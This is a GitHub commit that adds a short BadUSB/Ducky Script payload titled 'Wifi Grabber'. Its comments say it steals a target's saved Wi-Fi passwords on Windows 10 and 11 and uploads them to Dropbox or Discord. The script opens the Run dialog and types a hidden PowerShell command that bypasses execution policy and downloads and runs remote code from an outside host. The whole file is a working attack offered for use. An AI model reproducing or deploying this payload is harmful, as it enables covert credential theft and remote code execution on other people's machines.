Create WifiGrabber.txt

This commit is contained in:
I-Am-Jakoby 2022-12-20 18:33:57 -06:00 committed by GitHub
parent c2740c761d
commit dff14e6980
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -0,0 +1,12 @@
REM Title: Wifi Grabber
REM Author: I am Jakoby
REM Description: This payload grabs your targets wifi passwords and uploads them to either Dropbox, Discord, or both
REM Target: Windows 10, 11
GUI r
DELAY 500
STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';iwr jakoby.lol/e8v | iex
ENTER